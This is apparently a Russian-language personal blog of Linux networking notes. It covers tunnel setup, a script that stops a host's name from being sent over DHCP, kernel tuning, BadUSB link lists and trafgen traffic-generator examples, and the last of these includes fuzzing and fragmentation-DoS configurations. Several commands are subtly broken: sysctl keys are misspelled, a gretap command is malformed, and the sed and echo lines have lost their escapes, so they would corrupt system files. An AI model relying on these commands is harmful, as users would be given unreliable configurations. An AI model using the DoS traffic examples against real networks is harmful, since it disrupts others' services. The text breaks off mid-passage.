Рубрики
kali \ virus \ rootkit \ вирусы \ защита

Тунели / tunnel

Виды:

GRE-туннель (Generic Routing Encapsulation)
GRE (Generic Routing Encapsulation) — это протокол, 
который позволяет инкапсулировать различные сетевые протоколы в IP-пакетах, 
создавая туннель между двумя конечными точками. 
Это позволяет передавать пакеты через общую сеть (например, через интернет) как если бы они находились в частной сети.


IPIP (IP-in-IP) — это ещё один протокол туннелирования, 
который работает схоже с GRE, но он только инкапсулирует IP-пакеты в IP.
Это довольно простое решение для создания туннеля.

GREtap — это расширение GRE-туннеля, которое добавляет возможность работать с Ethernet-кадрами, а не только с IP-пакетами. 
Это позволяет передавать кадры уровня канала передачи данных (L2), что полезно для создания виртуальных локальных сетей (VLAN).

VXLAN (Virtual Extensible LAN) — это протокол, предназначенный для создания туннелей уровня L2 поверх IP-сети. 
Он использует UDP-порты (чаще всего 4789) для инкапсуляции Ethernet-кадров, 
что позволяет строить виртуальные локальные сети через общедоступные сети.


GRE подходит для гибких решений, позволяя инкапсулировать различные протоколы.
IPIP проще и используется для передачи только IP-пакетов.
GREtap расширяет возможности GRE, добавляя поддержку канала L2.
VXLAN — это решение для построения виртуальных L2-сетей поверх IP

Настройка:

GRE-туннель
ip link add name gretunnel type gre local 10.0.0.1 remote 10.0.0.2
ip addr add 192.168.0.1/24 dev gretunnel
ip link set dev gretunnel up

IPIP-туннель
ip tunnel add ipiptunnel mode ipip local 10.0.0.1 remote 10.0.0.2
ip addr add 192.168.0.1/24 dev ipiptunnel
ip link set dev ipiptunnel up


GRE+Ethernet (GREtap)
ip link add name gretap tunnel local 10.0.0.1 remote 10.0.0.2 ttl 255
ip addr add 192.168.0.1/24 dev gretap


VXLAN
ip link add vxlan0 type vxlan id 42 dev eth0 remote 10.0.0.2 dstport 4789
ip addr add 192.168.0.1/24 dev vxlan0
ip link set dev vxlan0 up
Рубрики
kali \ virus \ rootkit \ вирусы \ защита

Убираем лишний шум при подключение хоста к сети

Смена имени хоста (hostname):


Смена имени хоста (hostname)
sudo hostnamectl set-hostname <новое_имя_хоста>
Пример:
sudo hostnamectl set-hostname mypc

Если команды hostnamectl нет, можно отредактировать файл:
vim /etc/hostname

Редактирование файла hosts
vim /etc/hosts 
Найдите строку с текущим именем хоста и замените его на новое. 
Она должна выглядеть примерно так:
--------------
127.0.0.1   localhost
127.0.1.1   mypc
-------------

Перезагружаем систему
reboot

Если у вас ультелиты systemctl все таки есть то можно так:
systemctl restart systemd-hostnamed

Отключение передачи имени хоста через DHCP

Изменение настроек DHCP-клиента:
vim /etc/dhcp/dhclient.conf
---------------------------
send host-name "";
---------------------------

Обновление настроек NetworkManager (если используете):
vim /etc/NetworkManager/NetworkManager.conf
-------------------------------------------
[main]
dhcp=dhclient

[dhcp]
send-hostname=false
-------------------------------------------

Перезапустите службу NetworkManager:
systemctl restart NetworkManager

Использование sed для автоматического редактирования файлов:

0. Изменение имени хоста:
Вот как можно внести изменения в файлы /etc/hostname, /etc/hosts, /etc/dhcp/dhclient.conf, и /etc/NetworkManager/NetworkManager.conf:
NEW_HOSTNAME="mypc"

# Изменение имени хоста в /etc/hostname
sudo sed -i "s/.*/$NEW_HOSTNAME/" /etc/hostname

# Изменение имени хоста в /etc/hosts
sudo sed -i "s/^(127.0.1.1s*).*/1$NEW_HOSTNAME/" /etc/hosts


1. Отключение передачи имени хоста в DHCP
Для /etc/dhcp/dhclient.conf:
sudo sed -i "/^send host-name/ s|.*|send host-name "";|" /etc/dhcp/dhclient.conf
sudo grep -q "^send host-name" /etc/dhcp/dhclient.conf || echo 'send host-name "";' | sudo tee -a /etc/dhcp/dhclient.conf
Для /etc/NetworkManager/NetworkManager.conf:
Убедимся, что параметры dhcp=dhclient и send-hostname=false добавлены:
sudo sed -i "/^[main]/,/^[/ s/^dhcp=.*/dhcp=dhclient/" /etc/NetworkManager/NetworkManager.conf
sudo sed -i "/^[dhcp]/,/^[/ s/^send-hostname=.*/send-hostname=false/" /etc/NetworkManager/NetworkManager.conf
# Добавляем секции, если их нет
sudo grep -q "^[main]" /etc/NetworkManager/NetworkManager.conf || echo -e "n[main]ndhcp=dhclient" | sudo tee -a /etc/NetworkManager/NetworkManager.conf
sudo grep -q "^[dhcp]" /etc/NetworkManager/NetworkManager.conf || echo -e "n[dhcp]nsend-hostname=false" | sudo tee -a /etc/NetworkManager/NetworkManager.conf

2. После внесения изменений перезапустите службы:
sudo systemctl restart systemd-hostnamed
sudo systemctl restart networking
sudo systemctl restart NetworkManager

Скрипт на баше:

#!/bin/bash

# Убедимся, что скрипт запускается с правами root
if [[ $EUID -ne 0 ]]; then
   echo "Этот скрипт необходимо запускать с правами root." 
   exit 1
fi

# Новое имя хоста
NEW_HOSTNAME="mypc"

# Файлы для редактирования
HOSTNAME_FILE="/etc/hostname"
HOSTS_FILE="/etc/hosts"
DHCLIENT_FILE="/etc/dhcp/dhclient.conf"
NETWORK_MANAGER_FILE="/etc/NetworkManager/NetworkManager.conf"

echo "1. Изменяем имя хоста..."
# Изменение имени хоста в /etc/hostname
sed -i "s/.*/$NEW_HOSTNAME/" "$HOSTNAME_FILE"

# Изменение имени хоста в /etc/hosts
sed -i "s/^(127.0.1.1s*).*/1$NEW_HOSTNAME/" "$HOSTS_FILE"

echo "2. Отключаем передачу имени хоста через DHCP..."
# Настройка /etc/dhcp/dhclient.conf
if grep -q "^send host-name" "$DHCLIENT_FILE"; then
    sed -i "/^send host-name/ s|.*|send host-name "";|" "$DHCLIENT_FILE"
else
    echo 'send host-name "";' >> "$DHCLIENT_FILE"
fi

# Настройка /etc/NetworkManager/NetworkManager.conf
if grep -q "^[main]" "$NETWORK_MANAGER_FILE"; then
    sed -i "/^[main]/,/^[/ s/^dhcp=.*/dhcp=dhclient/" "$NETWORK_MANAGER_FILE"
else
    echo -e "n[main]ndhcp=dhclient" >> "$NETWORK_MANAGER_FILE"
fi

if grep -q "^[dhcp]" "$NETWORK_MANAGER_FILE"; then
    sed -i "/^[dhcp]/,/^[/ s/^send-hostname=.*/send-hostname=false/" "$NETWORK_MANAGER_FILE"
else
    echo -e "n[dhcp]nsend-hostname=false" >> "$NETWORK_MANAGER_FILE"
fi

echo "3. Перезапускаем службы..."
# Перезапуск служб для применения изменений
systemctl restart systemd-hostnamed
systemctl restart networking
systemctl restart NetworkManager

echo "Изменения применены!"
echo "Проверка текущего имени хоста:"
hostnamectl

Проверка:

Убедитесь, что имя хоста изменилось:
hostnamectl

Проверьте файл /etc/hosts и /etc/hostname:
cat /etc/hosts
cat /etc/hostname

Проверка сетевого демона:
systemctl status networking

Слушаем трафик:
sudo tcpdump -i eth0 port 67 or port 68

Рубрики
kali \ virus \ rootkit \ вирусы \ защита Конспект

Минимальная настройка ядра linux для обработки значительного трафика / производительность

Пример:

sysctl -w fs.file-max=100000
sysctl -w net.core.somaxconn=65535
sysctl -w net.core.netdev_max_blacklog=65536
sysctl -w net.ipv4.tcp_fin_timeout=15
sysctl -w net.ipv4.tcp_tw_reuse=1
sysctl -w net.ipv4.tcp_tw_recycle=1
sysctl -w net.ipv4.tcp_max_tw_buckets=65536
sysctl -w net.ipv4.tcp_window_scalling=1

Для любознательных что есть что:

net.core.somaxconn=65535 
Задает максимальное кол-во соединений, которые могут ожидать обработки в очереди. 
Важно для приложений.


net.core.netdev_max_blacklog=65536
Определяет максимальный размер очереди сетевых устройств обрабатывающих трафик

net.ipv4.tcp_fin_timeout=15
Время до ожидания завершения соединения (флаг fin)

net.ipv4.tcp_tw_reuse=1
Разрешаем использования сокетов TIME-WAIT для новых соединений.
По факту разрешает использования портов в статусе TIME-WAIT для новых соединений.

net.ipv4.tcp_tw_recycle=1
Активирует режим повторного использования портов в статусе TIME-WAIT.

net.ipv4.tcp_max_tw_buckets=65536
Увеличиваем кол-во сокетов time-wait

net.ipv4.tcp_window_scalling=1
Управляет масштабированием окна TCP. Увеличиваем размер TCP-окна если это возможно

ссылка с одной шляпой….

https://zip.bhv.ru/9785977519953.zip
Рубрики
kali \ virus \ rootkit \ вирусы \ защита

badusb

Ссылки:
[pastacode manual=»%0D%0Ahttps%3A%2F%2Faliexpress.ru%2Fwholesale%3FSearchText%3Dbadusb%0D%0Ahttps%3A%2F%2Fgithub.com%2Ftopics%2Fbadusb%0D%0Ahttps%3A%2F%2Fgithub.com%2Frobertio%2FDM-3212-Badusb%2Fblob%2Fmaster%2FREADME.md%0D%0Ahttps%3A%2F%2Fgithub.com%2Fwangwei39120157028%2FBadUSB%0D%0Ahttps%3A%2F%2Fgithub.com%2Fasciiterminal%2FCJMCU_ATMEGA32U4_BADUSB%0D%0Ahttps%3A%2F%2Fgithub.com%2FTheMMcOfficial%2FCJMCU-3212-wifi_ducky%0D%0Ahttps%3A%2F%2Fgithub.com%2Fjoelsernamoreno%2Fbadusb_sd_wifi%0D%0Ahttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DG-Z2rf_AN-c%26ab_channel%3D%25D0%259D%25D0%25BE%25D0%259A%25D0%25BE%25D0%25BC%25D0%25BF%0D%0A» provider=»manual» lang=»default»/]

Рубрики
kali \ virus \ rootkit \ вирусы \ защита

Генератор трафика / тест rfc2544 / netsniff-ng / trafgen

Ссылки:
[pastacode manual=»%0D%0Ahttp%3A%2F%2Fnetsniff-ng.org%2F%0D%0Ahttps%3A%2F%2Fgithub.com%2Fjonschipp%2Fgencfg%0D%0Ahttps%3A%2F%2Fgithub.com%2Fnetsniff-ng%2Fnetsniff-ng%0D%0Ahttps%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman8%2Ftrafgen.8.html%0D%0A» provider=»manual» lang=»default»/]

[pastacode manual=»%0D%0A0.%20%D0%A1%D1%82%D0%B0%D0%B2%D0%B8%D0%BC%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D1%8B%0D%0Aapt%20install%20netsniff-ng%20git%20%20%0D%0A%20%0D%0A1.%20%D0%A1%D0%BA%D0%B0%D1%87%D0%B8%D0%B2%D0%B0%D0%B5%D0%BC%20%D0%B2%20%D1%83%D0%B4%D0%BE%D0%B1%D0%BD%D0%BE%D0%B5%20%D0%BC%D0%B5%D1%81%D1%82%D0%BE%20%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B0%D1%82%D0%BE%D1%80%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D0%BE%D0%B2%20%D0%B4%D0%BB%D1%8F%20gentraf%0D%0A%20git%20clone%20https%3A%2F%2Fgithub.com%2Fjonschipp%2Fgencfg.git%20%0D%0A%0D%0A2.%20%20%D0%A1%D0%BE%D0%B1%D0%B8%D1%80%D0%B0%D0%B5%D0%BC%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%20%D0%B4%D0%BB%D1%8F%20gentraf%0D%0A%2Fgencfg.sh%20-G%20rfc2544%20-s%20192.168.88.61%20-d%20192.168.88.1%20%20-m%2052%3A54%3A00%3A27%3Af8%3Aa0%20-M%20b6%3A1d%3A99%3A22%3Add%3A07%0D%0AG%20rfc2544%20%20-%20%D0%B6%D0%B5%D0%BB%D0%B0%D0%B5%D0%BC%D1%8B%D0%B9%20%D1%82%D0%B5%D1%81%D1%82%0D%0A-s%20192.168.88.61%20%20-%20source%2C%20%D0%B8%D1%81%D1%82%D0%BE%D1%87%D0%BD%D0%B8%D0%BA%20%D1%82%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B0%20%D0%BE%D0%BA%D1%83%D0%B4%D0%B0%20%D0%B1%D1%83%D0%B4%D0%B5%D0%BC%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%D0%B0%D1%82%D1%8C%20%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B0%D1%82%D0%BE%D1%80%0D%0A-d%20192.168.88.1%20-%20%20dist%2C%20%D0%BA%D1%83%D0%B4%D0%B0%20%D1%82%D1%80%D0%B0%D1%84%D0%B8%D0%BA%20%D0%B4%D0%BE%D0%BB%D0%B6%D0%B5%D0%BD%20%D0%BF%D1%80%D0%B8%D0%BB%D0%B5%D1%82%D0%B5%D1%82%D1%8C%0D%0A-m%2052%3A54%3A00%3A27%3Af8%3Aa0%20-%20%D0%BC%D0%B0%D0%BA%20%D0%B8%D1%81%D1%82%D0%BE%D1%87%D0%BD%D0%B8%D0%BA%D0%B0%20%0D%0A-M%20b6%3A1d%3A99%3A22%3Add%3A07%20-%20%D0%BC%D0%B0%D0%BA%20%D0%BD%D0%B0%D0%B7%D0%BD%D0%B0%D1%87%D0%B5%D0%BD%D0%B8%D1%8F%0D%0A%0D%0A3.%20%D0%97%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B0%D1%86%D0%B8%D0%B8%20%D1%82%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B0%20%0D%0Atrafgen%20—dev%20enp1s0%20—conf%20rfc2544-1672235689%2F1024.cfg%0D%0A—dev%20enp1s0%20-%20%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D1%84%D0%B5%D0%B9%D1%81%0D%0A—conf%20rfc2544-1672235689%2F1024.cfg%20-%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%20%D1%80%D0%B0%D0%B7%D0%BC%D0%B5%D1%80%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%B0%201024%20(%D0%92%D0%BD%D0%B8%D0%BC%D0%B0%D0%BD%D0%B8%D0%B5%20%D1%82%D0%B0%D0%BC%20%D0%B2%20%D0%BA%D0%B0%D1%82%D0%B0%D0%BB%D0%BE%D0%B3%D0%B5%20%D0%B5%D1%81%D1%82%D1%8C%20%D0%B5%D1%89%D0%B5%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D0%B8)%0D%0A%0D%0A4.%20%D0%94%D0%B0%D0%BB%D0%B5%D0%B5%20%D0%BC%D1%8B%20%D0%BC%D0%BE%D0%B6%D0%B5%D0%BC%20%D0%BD%D0%B0%D0%B1%D0%BB%D1%8E%D0%B4%D0%B0%D1%82%D1%8C%20%D1%81%20%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C%D1%8E%20%D0%BB%D1%8E%D0%B1%D0%BE%D0%B3%D0%BE%20%D1%81%D0%BD%D0%B8%D1%84%D0%B5%D1%80%D0%B0%20%D0%BA%D0%B0%D0%BA%20%D0%BD%D0%B0%D1%88%20%D1%82%D1%80%D0%B0%D1%84%D0%B8%D0%BA%20%D0%BB%D0%B5%D1%82%D0%B8%D1%82%0D%0Atcpdump%0D%0Anetsniff-ng%20%0D%0A%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B9%20%D1%81%D0%BB%D0%B5%D0%B4%D1%83%D1%8E%D1%89%D0%B8%D0%B5%3A%0D%0Aifpps%20%0D%0A» provider=»manual» lang=»default»/]

trafgen примеры:
[pastacode manual=»%0D%0Atrafgen%20—dev%20eth0%20—conf%20trafgen.cfg%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%AD%D1%82%D0%BE%20%D1%81%D0%B0%D0%BC%D0%BE%D0%B5%20%D0%BF%D1%80%D0%BE%D1%81%D1%82%D0%BE%D0%B5%20%D0%B8%2C%20%D0%BD%D0%B0%D0%B2%D0%B5%D1%80%D0%BD%D0%BE%D0%B5%2C%20%D1%81%D0%B0%D0%BC%D0%BE%D0%B5%20%D1%80%D0%B0%D1%81%D0%BF%D1%80%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D1%82%D1%80%D0%B0%D1%84%D0%B3%D0%B5%D0%BD.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9E%D0%BD%20%D0%B1%D1%83%D0%B4%D0%B5%D1%82%20%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C%20%D1%82%D1%80%D0%B0%D1%84%D0%B8%D0%BA%2C%20%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B5%D0%BD%D0%BD%D1%8B%D0%B9%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D1%83%D1%80%D0%B0%D1%86%D0%B8%D0%B8%20»trafgen.cfg»%20%D0%B8%20%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D1%82%D1%8C%20%D0%B5%D0%B3%D0%BE%20%D1%87%D0%B5%D1%80%D0%B5%D0%B7%20%D1%81%D0%B5%D1%82%D0%B5%D0%B2%D0%BE%D0%B5%20%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D0%BE%20eth0.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8E%D1%82%D1%81%D1%8F%20%D0%B2%D1%81%D0%B5%20%D0%BF%D1%80%D0%BE%D1%86%D0%B5%D1%81%D1%81%D0%BE%D1%80%D1%8B%20%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD.%0D%0A%0D%0Atrafgen%20—dev%20eth0%20—conf%20trafgen.cfg%20—cpus%202-4%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%92%D0%BC%D0%B5%D1%81%D1%82%D0%BE%20%D1%82%D0%BE%D0%B3%D0%BE%2C%20%D1%87%D1%82%D0%BE%D0%B1%D1%8B%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D1%8C%20%D0%B2%D1%81%D0%B5%20%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD-%D0%BF%D1%80%D0%BE%D1%86%D0%B5%D1%81%D1%81%D0%BE%D1%80%D1%8B%2C%20%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D0%B2%D0%B0%D0%B9%D1%82%D0%B5%20%D1%82%D1%80%D0%B0%D1%84%D0%B8%D0%BA%20%D0%B8%D0%B7%20%D0%A6%D0%9F%202%2C%203%20%D0%B8%204.%0D%0A%0D%0Atrafgen%20-e%20%7C%20trafgen%20-i%20-%20-o%20lo%20—cpp%20-n%201%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%AD%D1%82%D0%BE%20%D0%BF%D1%80%D0%B8%D0%BC%D0%B5%D1%80%2C%20%D0%BA%D0%BE%D0%B3%D0%B4%D0%B0%20%D0%BC%D1%8B%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D1%8F%D0%B5%D0%BC%20%D0%BE%D0%B4%D0%B8%D0%BD%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%20%D0%B2%D1%81%D1%82%D1%80%D0%BE%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE%20%D0%BD%D0%B0%D0%BF%D1%80%D0%B8%D0%BC%D0%B5%D1%80%20%D1%87%D0%B5%D1%80%D0%B5%D0%B7%20%D0%BF%D0%B5%D1%82%D0%BB%D0%B5%D0%B2%D0%BE%D0%B5%20%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D0%BE.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9F%D1%80%D0%B8%D0%BC%D0%B5%D1%80%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D1%83%D1%80%D0%B0%D1%86%D0%B8%D1%8F%20%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D0%B5%D1%82%D1%81%D1%8F%20%D1%87%D0%B5%D1%80%D0%B5%D0%B7%20%D1%81%D1%82%D0%B0%D0%BD%D0%B4%D0%B0%D1%80%D1%82%D0%BD%D1%8B%D0%B9%20%D0%B2%D0%B2%D0%BE%D0%B4%2C%20%D0%B0%20%D1%82%D0%B0%D0%BA%D0%B6%D0%B5%20%D1%87%D0%B5%D1%80%D0%B5%D0%B7%20C%20%D0%BF%D1%80%D0%BE%D1%86%D0%B5%D1%81%D1%81%D0%BE%D1%80%20%D0%B4%D0%BE%20%D1%82%D0%BE%D0%B3%D0%BE%2C%20%D0%BA%D0%B0%D0%BA%20%D0%B5%D0%B3%D0%BE%20%D1%83%D0%B2%D0%B8%D0%B4%D0%B8%D1%82%20%D0%BA%D0%BE%D0%BC%D0%BF%D0%B8%D0%BB%D1%8F%D1%82%D0%BE%D1%80%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%BE%D0%B2%20trafgen.%0D%0A%0D%0Atrafgen%20—dev%20eth0%20—conf%20fuzzing.cfg%20—smoke-test%2010.0.0.1%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9F%D1%80%D0%BE%D1%87%D1%82%D0%B8%D1%82%D0%B5%20%D1%84%D0%B0%D0%B9%D0%BB%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D1%83%D1%80%D0%B0%D1%86%D0%B8%D0%B8%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%B0%20»fuzzing.cfg»%20(%D0%BA%D0%BE%D1%82%D0%BE%D1%80%D1%8B%D0%B9%20%D1%81%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B8%D1%82%20%D0%B2%D1%8B%D0%B7%D0%BE%D0%B2%D1%8B%20drnd())%20%D0%B8%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D1%8F%D0%B5%D1%82%20%D1%81%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D1%8B%20%D0%BA%20%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D1%83%20eth0.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9F%D0%BE%D1%81%D0%BB%D0%B5%20%D0%BA%D0%B0%D0%B6%D0%B4%D0%BE%D0%B3%D0%BE%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%B0%20%D0%BF%D1%80%D0%BE%D0%B2%D0%B5%D1%80%D0%BA%D0%B0%20%D1%81%D0%B2%D1%8F%D0%B7%D0%B8%20%D0%B0%D1%82%D0%B0%D0%BA%D1%83%D0%B5%D0%BC%D1%8B%D0%B9%20%D1%85%D0%BE%D1%81%D1%82%20%D1%81%20%D0%B0%D0%B4%D1%80%D0%B5%D1%81%D0%BE%D0%BC%2010.0.0.1%2C%20%D1%87%D1%82%D0%BE%D0%B1%D1%8B%20%D0%BF%D1%80%D0%BE%D0%B2%D0%B5%D1%80%D0%B8%D1%82%D1%8C%2C%20%D0%B5%D1%89%D0%B5%20%D0%B6%D0%B8%D0%B2.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%AD%D1%82%D0%BE%20%D1%82%D0%B0%D0%BA%D0%B6%D0%B5%20%D0%BE%D0%B7%D0%BD%D0%B0%D1%87%D0%B0%D0%B5%D1%82%2C%20%D1%87%D1%82%D0%BE%20%D0%BC%D1%8B%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B5%D0%BC%20%D1%82%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE%201%20%D0%A6%D0%9F%2C%20%D0%B8%20%D0%BD%D0%B5%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B9%D1%82%D0%B5%20TX_RING%2C%20%D0%B0%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D1%8F%D0%B9%D1%82%D0%B5(2)%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%BD%D1%8B%D0%B9%20%D0%B2%D0%B2%D0%BE%D0%B4-%D0%B2%D1%8B%D0%B2%D0%BE%D0%B4%20%D0%B8%D0%B7-%D0%B7%D0%B0%20%D0%B2%20%C2%AB%D0%BC%D0%B5%D0%B4%D0%BB%D0%B5%D0%BD%D0%BD%D1%8B%D0%B9%20%D1%80%D0%B5%D0%B6%D0%B8%D0%BC%C2%BB.%0D%0A%0D%0Atrafgen%20—dev%20wlan0%20—rfraw%20—conf%20beacon-test.txf%20-V%20—cpus%202%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%92%20%D0%BA%D0%B0%D1%87%D0%B5%D1%81%D1%82%D0%B2%D0%B5%20%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D0%B0%20%D0%B2%D1%8B%D0%B2%D0%BE%D0%B4%D0%B0%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B5%D1%82%D1%81%D1%8F%20»wlan0»%20%D0%B8%20%D0%BF%D0%BE%D0%BC%D0%B5%D1%89%D0%B0%D0%B5%D1%82%D1%81%D1%8F%20%D0%B2%20%D1%80%D0%B5%D0%B6%D0%B8%D0%BC%20%D0%BC%D0%BE%D0%BD%D0%B8%D1%82%D0%BE%D1%80%D0%B8%D0%BD%D0%B3%D0%B0%2C%20%D0%BF%D0%BE%D1%8D%D1%82%D0%BE%D0%BC%D1%83%20%D0%BC%D1%8B%20%D1%81%D0%BE%D0%B1%D0%B8%D1%80%D0%B0%D0%B5%D0%BC%D1%81%D1%8F%20%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D0%B2%D0%B0%D1%82%D1%8C%20%D1%81%D1%8B%D1%80%D0%BE%D0%B9%20802.11%20%D0%BA%D0%B0%D0%B4%D1%80%D1%8B%20%D0%BF%D0%BE%20%D0%B2%D0%BE%D0%B7%D0%B4%D1%83%D1%85%D1%83.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B9%D1%82%D0%B5%20»beacon-test.txf»%20%D1%84%D0%B0%D0%B9%D0%BB%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D1%83%D1%80%D0%B0%D1%86%D0%B8%D0%B8%2C%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%B8%D1%82%D0%B5%20trafgen%20%D0%B2%20%D0%BF%D0%BE%D0%B4%D1%80%D0%BE%D0%B1%D0%BD%D1%8B%D0%B9%20%D1%80%D0%B5%D0%B6%D0%B8%D0%BC%20%D0%B8%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B9%D1%82%D0%B5%20%D1%82%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE%202%20CPU%2C%20%D0%BD%D0%B0%D1%87%D0%B8%D0%BD%D0%B0%D1%8F%20%D1%81%20CPU%200.%0D%0A%0D%0Atrafgen%20—dev%20em1%20—conf%20frag_dos.cfg%20—rand%20—gap%201000us%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B9%D1%82%D0%B5%20trafgen%20%D0%B2%20%D1%80%D0%B5%D0%B6%D0%B8%D0%BC%D0%B5%20sendto(2)%20%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%BE%20%D1%80%D0%B5%D0%B6%D0%B8%D0%BC%D0%B0%20TX_RING%20%D0%B8%20%D1%81%D0%BF%D0%B0%D1%82%D1%8C%20%D0%BF%D0%BE%D1%81%D0%BB%D0%B5%20%D0%BA%D0%B0%D0%B6%D0%B4%D0%BE%D0%B3%D0%BE%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%B0%20%D1%81%D1%82%D0%B0%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B2%D1%80%D0%B5%D0%BC%D0%B5%D0%BD%D0%BD%D0%BE%D0%B9%20%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%B2%D0%B0%D0%BB%20%D0%BD%D0%B0%201000%20%D0%BC%D0%BA%D1%81.%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%A1%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%80%D1%83%D0%B9%D1%82%D0%B5%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D1%8B%20%D0%B8%D0%B7%20»frag_dos.cfg»%20%D0%B8%20%D0%B2%D1%8B%D0%B1%D0%B5%D1%80%D0%B8%D1%82%D0%B5%20%D1%81%D0%BB%D0%B5%D0%B4%D1%83%D1%8E%D1%89%D0%B8%D0%B9%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D1%8B%20%D0%B4%D0%BB%D1%8F%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BA%D0%B8%20%D1%81%D0%BB%D1%83%D1%87%D0%B0%D0%B9%D0%BD%D1%8B%D0%BC%20%D0%BE%D0%B1%D1%8